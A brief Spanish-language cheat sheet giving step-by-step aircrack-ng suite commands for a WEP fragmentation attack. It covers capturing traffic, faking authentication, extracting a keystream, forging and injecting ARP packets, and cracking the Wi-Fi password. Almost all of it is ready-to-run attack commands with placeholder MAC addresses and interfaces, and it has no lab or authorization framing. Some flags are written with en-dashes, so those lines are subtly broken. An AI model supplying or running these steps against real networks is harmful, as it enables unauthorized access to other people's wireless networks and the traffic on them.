Fragmentation Attack

Ataque usado para la obtención de contraseña. Divide y analiza pequeños fragmentos de paquetes capturados para reconstruir un paquete completo con un IV conocido para descifrar la contraseña.


  • Capturar tráfico con Airodump-ng por mucho tiempo

sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
  • En paralelo, ejecutar MACchanger para conocer la dirección MAC de la interfaz de red utilizada

macchanger --show <wifi_interface>
  • Ejecutar ataque fakeauth con Aireplay-ng

sudo aireplay-ng --fakeauth 0 –e <NAME_AP> -a <MAC_AP> -h <MAC_wifi_interface> <wifi_interface>
  • Ejecutar ataque fragmentation con Aireplay-ng (presionar "y" cuando sea solicitado)

sudo aireplay-ng --fragmentation –b <MAC_AP> -h <MAC_wifi_interface> <wifi_interface>
  • Ejecutar packetforge-ng para crear paquetes válidos en base al fichero XOR creado anteriormente

  • Las IP pueden ser aleatorias mientras respeten la estructura de una dirección IPv4

sudo packetforge-ng --arp –a <MAC_AP> -h <MAC_wifi_interface> -k <Source_IP> -l <Destination_IP> -y XOR_file -w output_file
  • Ejecutar ataque interactive con Aireplay-ng para inyectar los nuevos paquetes al espectro de red

sudo aireplay-ng --interactive –r output_file <wifi_interface>
  • Crackear contraseña con Aircrack-ng desde fichero con tráfico capturado en Airodump-ng

sudo aircrack-ng –b <MAC_AP> traffic_file.cap